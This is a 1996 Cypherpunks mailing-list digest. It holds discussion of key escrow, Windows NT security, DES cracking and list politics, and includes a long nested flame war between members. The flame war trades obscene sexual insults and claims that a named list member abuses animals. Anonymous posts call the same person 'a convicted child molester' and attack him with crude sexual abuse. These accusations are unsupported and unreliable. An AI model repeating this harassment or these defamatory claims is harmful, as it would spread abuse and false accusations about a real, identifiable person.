Subject: Re: gack vs. key escrow vs. key recovery
Message-ID: <19961005064623375.AAA228@GIGANTE>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 03 Oct 1996 23:44:59 -0700, Dale Thorn wrote:

>Sounds to me like there's a need for a program that can produce secure 
>encryption, yet the output looks like "real junk", i.e., not anything 
>like what one of the *better* programs would produce.  Then you can 
>claim (with testimony of experts if necessary) that "I didn't encrypt 
>it, must be just garbage".  And even if you got some bozo govt. person 
>testifying against you, you shouldn't have much problem making them look 
>stupid and vindictive in front of a jury.


OTP anyone?


#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 5 Oct 1996 17:06:45 +0800
To: cypherpunks@toad.com
Subject: [SPAM] More "fuckhead" e-mail from Timmy May and his young friends
In-Reply-To: <199610050215.AA00807@crl5.crl.com>
Message-ID: <uk5aVD10w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Timmy May has no life.

>From: Troy Varange <varange@crl.com>
>Message-Id: <199610050215.AA00807@crl5.crl.com>
>Subject: Re: [VULIS]
>To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
>Date: Fri, 4 Oct 1996 19:15:36 -0700 (PDT)
>In-Reply-To: <FV67uD8w165w@bwalk.dm.com> from "Dr.Dimitri Vulis KOTM" at Oct 2, 96 08:29:14 pm
>X-Mailer: ELM [version 2.4 PL23]
>Mime-Version: 1.0
>Content-Type: text/plain; charset=US-ASCII
>Content-Transfer-Encoding: 7bit
>Content-Length: 7527
>
>>
>> I have no dog, nor any other pets.  Timmy May (fart) reportedly has two cats.
>> If you suspect that Timmy May (fart) sexually abuses his cats, or any other
>> animals, you should promptly contact the ASPCA and also alert rec.pets.cats.
>>
>> (Frankly, I doubt that the old fart can get his dick up to sexually abuse
>> anything, including his cats. Senility puts an end to sexual molestation.)
>>
>> >From: Troy Varange <varange@crl.com>
>> >Message-Id: <199610021931.AA24883@crl11.crl.com>
>> >Subject: Important
>> >To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
>> >Date: Wed, 2 Oct 1996 12:31:21 -0700 (PDT)
>> >In-Reply-To: <gqH3uD93w165w@bwalk.dm.com> from "Dr.Dimitri Vulis KOTM" at Sep 30, 96 07:57:27 am
>> >X-Mailer: ELM [version 2.4 PL23]
>> >Mime-Version: 1.0
>> >Content-Type: text/plain; charset=US-ASCII
>> >Content-Transfer-Encoding: 7bit
>> >Content-Length: 6226
>> >
>> >Dr. Vulis sucks his dog's butt.
>> >
>> >> Timmy May has no life.
>> >>
>> >> >From: Troy Varange <varange@crl.com>
>> >> >Message-Id: <199609300441.AA10704@crl12.crl.com>
>> >> >Subject: Re: Vulis FUCKHEAD sucks Timmy's Cock
>> >> >To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
>> >> >Date: Sun, 29 Sep 1996 21:41:42 -0700 (PDT)
>> >> >In-Reply-To: <LJV2uD91w165w@bwalk.dm.com> from "Dr.Dimitri Vulis KOTM" at Sep 29, 96 11:58:09 pm
>> >> >X-Mailer: ELM [version 2.4 PL23]
>> >> >Mime-Version: 1.0
>> >> >Content-Type: text/plain; charset=US-ASCII
>> >> >Content-Transfer-Encoding: 7bit
>> >> >Content-Length: 5298
>> >> >
>> >> >Vulis sucks Timmy's boyfriend's cock.
>> >> >>
>> >> >> Timmy May has no life.
>> >> >>
>> >> >> >From: Troy Varange <varange@crl.com>
>> >> >> >Message-Id: <199609300332.AA09870@crl12.crl.com>
>> >> >> >Subject: Re: [SPAM] More "fuckhead" fan mail from Timmy "peteur" May
>> >> >> >To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
>> >> >> >Date: Sun, 29 Sep 1996 20:32:58 -0700 (PDT)
>> >> >> >In-Reply-To: <ueP2uD86w165w@bwalk.dm.com> from "Dr.Dimitri Vulis KOTM" at Sep 29, 96 09:45:41 pm
>> >> >> >X-Mailer: ELM [version 2.4 PL23]
>> >> >> >Mime-Version: 1.0
>> >> >> >Content-Type: text/plain; charset=US-ASCII
>> >> >> >Content-Transfer-Encoding: 7bit
>> >> >> >Content-Length: 4378
>> >> >> >
>> >> >> >>                    berserk
>> >> >> >> Timmy May has gone        . Has he been eating speed?
>> >> >> >>                    bananas
>> >> >> >>
>> >> >> >> >From: Troy Varange <varange@crl.com>
>> >> >> >> >Message-Id: <199609300138.AA08482@crl12.crl.com>
>> >> >> >> >Subject: Re: [SPAM] More fan mail from Timmy "peteur" May
>> >> >> >> >To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
>> >> >> >> >Date: Sun, 29 Sep 1996 18:38:05 -0700 (PDT)
>> >> >> >> >In-Reply-To: <FFi2uD82w165w@bwalk.dm.com> from "Dr.Dimitri Vulis KOTM" at Sep 29, 96 07:14:50 pm
>> >> >> >> >X-Mailer: ELM [version 2.4 PL23]
>> >> >> >> >Mime-Version: 1.0
>> >> >> >> >Content-Type: text/plain; charset=US-ASCII
>> >> >> >> >Content-Transfer-Encoding: 7bit
>> >> >> >> >Content-Length: 3442
>> >> >> >> >
>> >> >> >> >>
>> >> >> >> >> What has Timmy been smoking?
>> >> >> >> >>
>> >> >> >> >> ]From paul@fatmans.demon.co.uk  Sun Sep 29 19:03:40 1996
>> >> >> >> >> ]Received: by bwalk.dm.com (1.65/waf)
>> >> >> >> >> ]	via UUCP; Sun, 29 Sep 96 19:14:06 EDT
>> >> >> >> >> ]	for dlv
>> >> >> >> >> ]Received: from disperse.demon.co.uk by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
>> >> >> >> >> ]        id AA25790 for dlv@bwalk.dm.com; Sun, 29 Sep 96 19:03:40 -0400
>> >> >> >> >> ]Received: from post.demon.co.uk ([(null)]) by relay-2.mail.demon.net  id ac16129;
>> >> >> >> >> ]          29 Sep 96 15:59 BST
>> >> >> >> >> ]Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net
>> >> >> >> >> ]           id aa09441; 29 Sep 96 15:54 BST
>> >> >> >> >> ]Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP
>> >> >> >> >> ]	id AA843903697 ; Sat, 28 Sep 96 09:41:37 +0000
>> >> >> >> >> ]Comments: Authenticated sender is <paul@fatmans.demon.co.uk>
>> >> >> >> >> ]From: paul@fatmans.demon.co.uk
>> >> >> >> >> ]To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
>> >> >> >> >> ]Date: Sat, 28 Sep 1996 09:21:37 +0000
>> >> >> >> >> ]Mime-Version: 1.0
>> >> >> >> >> ]Content-Type: text/plain; charset=US-ASCII
>> >> >> >> >> ]Content-Transfer-Encoding: 7BIT
>> >> >> >> >> ]Subject: Re: Possible subs attack????
>> >> >> >> >> ]Priority: normal
>> >> >> >> >> ]X-Pm-Encryptor: JN-PGP-P, 4
>> >> >> >> >> ]X-Mailer: Pegasus Mail for Windows (v2.31)
>> >> >> >> >> ]Message-Id: <844008901.9441.0@fatmans.demon.co.uk>
>> >> >> >> >> ]
>> >> >> >> >> ]-----BEGIN PGP SIGNED MESSAGE-----
>> >> >> >> >> ]
>> >> >> >> >> ]
>> >> >> >> >> ]> The lying sack of shit Timmy May <paul@fatmans.demon.co.uk> writes:
>> >> >> >> >> ]
>> >> >> >> >> ]> The lying sack of shit Timmy May lies again, as usual.
>> >> >> >> >> ]
>> >> >> >> >> ]Fuck you,
>> >> >> >> >> ]
>> >> >> >> >> ]I am not Tim May, Check out the return path if you don`t believe me,
>> >> >> >> >> ]if you still don`t here`s my PGP public key signed by the EFF, they
>> >> >> >> >> ]don`t sign keys here and there without checking ID`s...
>> >> >> >> >> ]
>> >> >> >> >> ]Type Bits/KeyID    Date       User ID
>> >> >> >> >> ]pub  1024/5BBFAEB1 1996/07/30 Paul Bradley <paul@fatmans.demon.co.uk>
>> >> >> >> >> ]
>> >> >> >> >> ]- -----BEGIN PGP PUBLIC KEY BLOCK-----
>> >> >> >> >> ]Version: 2.6.3ia
>> >> >> >> >> ]
>> >> >> >> >> ]mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
>> >> >> >> >> ]6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
>> >> >> >> >> ]sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
>> >> >> >> >> ]tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy
>> >> >> >> >> ]NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP
>> >> >> >> >> ]Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b
>> >> >> >> >> ]j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k
>> >> >> >> >> ]C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/
>> >> >> >> >> ]9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90
>> >> >> >> >> ]En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2
>> >> >> >> >> ]YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp
>> >> >> >> >> ]put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW
>> >> >> >> >> ]LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi
>> >> >> >> >> ]mUqFH41Z7NkyO8ZFdi5GGX0=
>> >> >> >> >> ]=CMZA
>> >> >> >> >> ]- -----END PGP PUBLIC KEY BLOCK-----
>> >> >> >> >> ]
>> >> >> >> >> ]
>> >> >> >> >> ]
>> >> >> >> >> ]-----BEGIN PGP SIGNATURE-----
>> >> >> >> >> ]Version: 2.6.3ia
>> >> >> >> >> ]Charset: cp850
>> >> >> >> >> ]
>> >> >> >> >> ]iQCVAwUBMkzuH75OPIRbv66xAQHSmQQAqw0F/lIsCcQwOpiSQDx4hMqOVVUVXbyR
>> >> >> >> >> ]3RMWY20ECE0TpAtJ6hkAiqphsWUSBqiFj2kGHMh+jHSHXIMPF+m1qtwVbgutJC7B
>> >> >> >> >> ]8VYWj0VP+bGu5dEUisLrVHDNj5ucEIDyK2GnqObiCiKARFUbOuZnMQOp9TDJqibh
>> >> >> >> >> ]2Wqa5+h8R7g=
>> >> >> >> >> ]=/M2U
>> >> >> >> >> ]-----END PGP SIGNATURE-----
>> >> >> >> >> ]
>> >> >> >> >> ]  Datacomms Technologies web authoring and data security
>> >> >> >> >> ]       Paul Bradley, Paul@fatmans.demon.co.uk
>> >> >> >> >> ]  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org
>> >> >> >> >> ]       Http://www.cryptography.home.ml.org/
>> >> >> >> >> ]      Email for PGP public key, ID: 5BBFAEB1
>> >> >> >> >> ]     "Don`t forget to mount a scratch monkey"
>> >> >> >> >>
>> >> >> >> >Fuckhead.
>> >> >> >>
>> >> >> >Fuckhead.  We know your behind Vulis, Cock-sucker
>> >> >>
>> >> >and he swallows
>> >>
>> >
>>
>Fuckhead.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "<pstira@escape.com>" <pstira@escape.com>
Date: Sat, 5 Oct 1996 13:37:56 +0800
To: Dustbin Freedom Remailer <dustman@athensnet.com>
Subject: Re: Signs of Trouble in D.C.
In-Reply-To: <199610021523.LAA12819@porky.athensnet.com>
Message-ID: <Pine.BSI.3.91.961004235017.15383A-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


The news these days is NOT good.

Just tonight:    Anybody under the age of 16 will now be assigned a 
chaperone (paid by the mall) at the Passaic Mall.  Will be carded.

		The use of ATM's at night will be banned.

		Payphones will be eradicated in one area : they attract drug
		dealers, et al.

I don't like where we are headed. This is only started.

-Millie, from my bf's acct.
sfuze @ tiac . net

-"live from New york"

On Tue, 1 Oct 1996, Dustbin Freedom Remailer wrote:

> On Tue, 1 Oct 1996, Black Unicorn wrote:
> 
> > Any person congregating in a group of 2 or more persons on 
> > public space within the boundaries of this drug free zone for 
> 
> Keep moving, proles.  The War on Some Drugs must continue.  Now excuse me
> while I join my friends for a joint.
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Sat, 5 Oct 1996 16:58:23 +0800
To: "Petr Snajdr" <snow@smoke.suba.com>
Subject: Re: WINDOWS NT ????
Message-ID: <19961005065648125.AAA235@GIGANTE>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 04 Oct 1996 22:03:17 +1030, Petr Snajdr wrote:

>> > > > > is Windows NT secured system ?
>> > > NT? Secured? hahahahahahahahahahahahahahahahhahahahahahahaha
>> > How ?

>>      By turning off the machine, unpluging the ethernet, moving the
>> hard drive to another state...

>    8-) ..and Os/2,unix .etc.etc. not ?

OS/2 doesn't claim to be a secure multiuser operating system.  If they have
console access, they *can* get almost anything*.  

Unix can be secure, but most places don't run it in the most secure form. 
However, your average Unix box is probably going to do pretty well,
especially if you've compiled Linux with an encrypting file system.


Microsoft claims C2 or higher for NT and deserves any ragging they get if
it's not.   Ditto for any other vendor who claims one thing and sells
another.
BTW:  Bizarre NT Quirk #15413 -  The Administrator account does not have
access to the entire disk.  You got it - if you're the administrator you
still cannot look into certain directories belonging to another user - even
if you've given all access privileges to the Admin account.  Got a few
chuckles at work.


* -  The various OS/2 Servers have a new version of the High Performance File
System. HPFS386 does a much better job of maintaining security.   Apparently
even the boot-floppy that can defeat NTFS won't work.   I haven't verified
this yet because I'm still waiting for my personal copy of Warp Server
Advanced-SMP to arrive.

#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Sat, 5 Oct 1996 18:24:54 +0800
To: "Bill Stewart" <snajdr@pvt.net>
Subject: Re: WINDOWS NT ????
Message-ID: <19961005065910250.AAA222@GIGANTE>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 04 Oct 1996 05:41:42 -0700, Bill Stewart wrote:

>> is Windows NT secured system ?

>Windows NT 3.51 is a real operating system.  It is not as secure
>as I would like, but it is much better than Windows 3.1, which was
>totally insecure.  It has some good security techniques,
>but I don't know how secure the networking is, and networking
>is the big technical insecurity on most machines today.  
>(Well, bad administration is the biggest insecurity on almost all 
>machines for almost all time.  And physical security is also big.)

>Windows 4.x moves the graphics/windowing system into Ring 0,
>where the "secure" parts of the kernel are.  Bad.
>This means graphics bugs can make the kernel insecure or crash.
I must say I like the way OS/2's Workplace Shell can crash entirely (doesn't
happen here anymore; did with some really crappy video drivers for an old
Trident 8900) and you can watch while it restarts it (takes about 10 seconds
and didn't bother open apps).   NT's shell seems to be a *little* harder to
screw up, but when it does it goes bigtime.

>I don't trust it, especially because Windows 3.1 crashes all the time
>for me, and stupid bugs make Windows 3.1 behave badly for me.
>So if they put the window system in the kernel, I don't trust it.

You lose speed but gain security and stability - the continual operating
sytem tradeoff.

#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Sat, 5 Oct 1996 17:53:30 +0800
To: "Ernest Hua" <m5@tivoli.com>
Subject: Re: How to fight GAK by obeying the law
Message-ID: <19961005070015328.AAA64@GIGANTE>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 04 Oct 1996 08:02:04 -0500, Mike McNally wrote:

>> First thing we definitely need is a way to determine with fairly good
>> accuracy, whether a host is in the U.S.

>I really don't see how that's possible, given the possibility of me
>taking my laptop to Ecuador, dialing into a stateside ISP, and being
>issued an IP address in the ISP's domain.  In other words, anything
>that bases a decision on host location by inference on the domain 
>will inherently be rooted in the notion that hosts in that domain are
>stuck to the ground "nearby".

Maybe have the option of identifying host mobility?

#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Sat, 5 Oct 1996 17:33:50 +0800
To: "Adamsc" <shamrock@netcom.com>
Subject: Re: ADJ_ust
Message-ID: <19961005070121156.AAA66@GIGANTE>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 4 Oct 1996 06:02:16 -0700 (PDT), Lucky Green wrote:

>> I have strong
>> doubts that someone would come up with a non-nuke that could destroy stuff
>> indiscriminately within a useably large area.

>Fuel/air bombs.

I meant with an EMP/HIRF/Buzzword-Blaster, as hyped in the press.  FAE
remains a potent option.  The reference to a nuke was along the lines of a
nuke-pumped EMP blast.

#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Sat, 5 Oct 1996 18:27:22 +0800
To: "Adamsc" <shamrock@netcom.com>
Subject: Re: Can we kill single DES?
Message-ID: <19961005070356406.AAA202@GIGANTE>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 4 Oct 1996 06:16:44 -0700 (PDT), Lucky Green wrote:

>> >1. Is this a good idea? What will happen if DES becomes perceived
>> >    as insecure?
>> 
>> That's Declan's department (and other non-clueless journalists - declan is
>> just the most visible).   If it get's widespread and the target is something
>> like Digicash, it'd get picked up by the Crime/Snoozeweek crowd.

>Sorry, not a chance. The symmetric cipher used in Ecash is 3DES. Since 
>DigiCash has the good fortune to be located in The Netherlands, full 
>strength crypto can be (and is) used in all their products.

I guess that was kind of ambigous.  What I meant was any protocal/system
where money is changing hands protected only by DES.   That's what I meant by
"like digicash".   I don't even know if such a beast exists, but was
suggesting that anything involving weakly protected money would be a good
target because it highlights the vulnerability and would get media attention.

#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Sat, 5 Oct 1996 18:02:20 +0800
To: "Bruce M." <cypherpunks@toad.com>
Subject: Re: Can we kill single DES?
Message-ID: <19961005070449906.AAA214@GIGANTE>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 4 Oct 1996 09:14:02 -0500 (CDT), Bruce M. wrote:

>> A Linux port (Pentium) would be *very* good - lots of Linux people tend to by
>> pro-cpunk.  Ditto for OS/2.   And who knows, if you hyped the business
>> aspects enough you might even find IBM or some other large corp willing to
>> donate some time on large system.

>    Maybe Deep Blue gets bored in between its chess matches. :)

Or maybe they need something to test that HUGE massively parallel
supercomputer they're building for DOE!

#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Sat, 5 Oct 1996 17:26:23 +0800
To: cypherpunks@toad.com
Subject: Who the heck is "CYBERPROMO" and why are they spamming me?
Message-ID: <199610050725.AAA10682@krypton.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain


I keep getting mail from an "abusebot@savetrees.com" ...

This is getting very very annoying.

Ern




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Sat, 5 Oct 1996 17:16:52 +0800
To: "John Fricker" <snow@smoke.suba.com>
Subject: RE: WINDOWS NT ????
Message-ID: <19961005072604328.AAA213@GIGANTE>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 04 Oct 1996 17:29:40 -0700, John Fricker wrote:

>An NT machine running off the shelf protocols and services is certainly more secure than 
>your average linux install. Of course clueless administrators for either (any) platform can 
>leave the door wide open easily enough. 

If you define off-the-shelf as what comes on the CD-ROM, true.  We certainly
couldn't find drivers for half the protocals we use...

Otherwise, I'd be tempted to point out the hazards in trusting one piece of
code more than another.  Particularly since that linux box would come with
source code, whereas most NT services don't...


Also, it came as a great shock to me that there was an "average" linux
install.  Is there an average Linux anything? <g>

#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Sat, 5 Oct 1996 17:18:39 +0800
To: "John Fricker" <stewarts@ix.netcom.com>
Subject: RE: WINDOWS NT ????
Message-ID: <19961005072939812.AAA65@GIGANTE>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 04 Oct 1996 17:43:52 -0700, John Fricker wrote:

>>> is Windows NT secured system ?

>>Windows 4.x moves the graphics/windowing system into Ring 0,
>>where the "secure" parts of the kernel are.  Bad.
>>This means graphics bugs can make the kernel insecure or crash.
>>I don't trust it, especially because Windows 3.1 crashes all the time
>>for me, and stupid bugs make Windows 3.1 behave badly for me.
>>So if they put the window system in the kernel, I don't trust it.
>>End of message

>Buggy video drivers though can bring the system down. 
This is 99% of the problems with any modern operating system: drivers written
by Juanito's House of Taiwanese Software.
>But this does not affect security, only stability.

>Security in NT can be defeated by any clever, out of work, bored, NT device driver author >who brews up a stealth device driver replacement (perhaps a COM port improvement) that >could run amok on the file system or basically do anything. Of course, any clever device >driver developer is making enough money to not be bored nor even consider writing a >backdoor into a driver. Right?

Doctor Dobb's had an article (with source) that demonstrated a driver that
gave full access to *EVERY* application running on an NT box.   They also
showed how it could be limited to a single application.   I believe the
source is on their web site...

#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 5 Oct 1996 17:48:24 +0800
To: John Fricker <jfricker@vertexgroup.com>
Subject: RE: WINDOWS NT ????
Message-ID: <199610050744.AAA21505@dfw-ix1.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:43 PM 10/4/96 -0700, John Fricker <jfricker@vertexgroup.com> wrote:
>Security in NT can be defeated by any clever, out of work, bored, 
>NT device driver author who brews up a stealth device driver replacement 
>(perhaps a COM port improvement) that could run amok on the file system or
>basically do anything. 

Good point; if you can talk somebody into installing device drivers,
most security guarantees go out the window, and if you can talk
a system administrator (i.e. "the user") into installing unexamined code,
he's lost.  And on PCs, users install unexamined stuff all the time.

>Of course, any clever device driver developer is making enough money to 
>not be bored nor even consider writing a backdoor into a driver. Right?

Definitely....

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
America's Open Presidential Debate - Beyond Dole and Clinton!
<A href="http://gate.net/~bdcollar/bbe/debate.htm">Tuesday, Oct. 8th 8:00 PM
EDT</a>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dustman@athensnet.com (Anonymous)
Date: Sat, 5 Oct 1996 15:38:00 +0800
To: cypherpunks@toad.com
Subject: Re: [IMPORTANT] GAK
In-Reply-To: <199610041549.LAA26732@porky.athensnet.com>
Message-ID: <199610050503.BAA30677@porky.athensnet.com>
MIME-Version: 1.0
Content-Type: text/plain


> Timmy May is a convicted child molester.

When and where was he convicted?  How long did he spend in jail?
Where can I find out more information about this?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 5 Oct 1996 19:29:31 +0800
To: Steve Schear <azur@netcom.com>
Subject: Re: The Right to Keep and Bear Crypto
In-Reply-To: <v02130500ae7ac982a9d8@[10.0.2.15]>
Message-ID: <32561974.69FA@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Steve Schear wrote:
> >Why is it "disturbing" that for administrative convenience a
> >regulation uses a shorthand term (in effect saying "treat crypto as
> >if it was a munition"), but that the courts say whatever convenient
> >shorthand you use for regulatory bookkeeping, it has no
> >constitutional effect?

[some text deleted]

> >I might add that I personally find all discussions of plots to kill
> >people, or to watch gleefully while others seek to do so, so morally
> >repulsive that I now killfile everyone who takes part in them.

> I hope that includes all comuniques from our government's Executive
> branch (although they almost never discuss these things publitically,
> with the possible exception of our raid on Kadaffi).  How about the
> popular U.S. consensus that the government aught to have killed
> Saddam?

[more text deleted]

> Thanks for your informative responses.  I don't expect a reply as
> you've undoubtedly placed me in your kill file (as some other may have
> already).

Hooray for a great post.  I'd really like to see this person live up to 
his/her words, and killfile (in *every* applicable way) all those 
homicidal bastards, including, but not limited to, Bill Clinton, Lloyd 
Bentsen, Bush, Eagleburger, Scowcroft, Summers, Reno, Freeh, Deutsch, 
and so on.  Kill(file) 'em all, and let God sort 'em out.  Heh heh.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@zifi.genetics.utah.edu (Anonymous)
Date: Sat, 5 Oct 1996 17:24:41 +0800
To: cypherpunks@toad.com
Subject: [IMPORTANT] Blowfish
Message-ID: <199610050719.BAA07279@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


Timothy May's 16Kb brain's single convolution is 
directly wired to his rectum for input and his T1 
mouth for output. That's 16K bits, not bytes. Anal 
intercourse has caused extensive brain damage.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 5 Oct 1996 19:09:36 +0800
To: Moroni <moroni@scranton.com>
Subject: Re: I resent the word cult.
In-Reply-To: <Pine.LNX.3.95.961004185932.2723D-100000@user1.scranton.com>
Message-ID: <32561E31.7B89@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Moroni wrote:
> The resent the word cult being used to describe my religions.
> While I don't think it is good to make fun of even one's own religion
> I really think that it is in bad taste to knock another's religion.
> Time and bandwidth have been wasted on more than one occasion with
> your interjecting your personal views about other peoples religions
> only to find that other people do not view their faiths academically.
> I think that all religion should be kept off this list . I did not
> become a member to prostelytise people on this list and did not expect
> other people to start agitating mormons or moslems or Jews or other
> faiths. I mind my p's&q's but I don't have and certainly will sit idly
> by when someone makes my people look bad. Any trouble that you have
> made starting this thread was done by you so don't complain.
> Inciderntally, I emailed tilly a great source for soy meats for
> all those that have emailed me to say that they are returning to the
> church.

> On Fri, 4 Oct 1996, Timothy C. May wrote:

[Tim's text deleted to save space only]

To Moroni: You talk about "my people" and "my religion".  Do you *own* 
these people?  Maybe your church owns their minds, huh?  What purpose 
does big-time organized religion serve other than to control the 
otherwise dangerous and predatory species we call human?

I guess if "your people" didn't kill anyone this year (or this decade, 
or in the last 50 years ad nauseam), then we should pin a medal on your 
chest, yes?  Frankly, it doesn't matter per se what "your people" pledge 
to do or not do, what matters is you, and me, and other individuals who 
*learn* not to kill, and to not have a desire to kill, and so forth.

"Your people" are always going to frighten others and stir up paranoia, 
for the very simple reason that:  1. They're human, and therefore are 
predators, and  2. In a large group like the Mormons, they have real 
power.  And this applies to all such groups, BTW.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 5 Oct 1996 19:16:28 +0800
To: "<pstira@escape.com>
Subject: Re: Signs of Trouble in D.C.
In-Reply-To: <Pine.BSI.3.91.961004235017.15383A-100000@escape.com>
Message-ID: <32562130.1B99@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


<pstira@escape.com> wrote:
> The news these days is NOT good.
> Just tonight:    Anybody under the age of 16 will now be assigned a
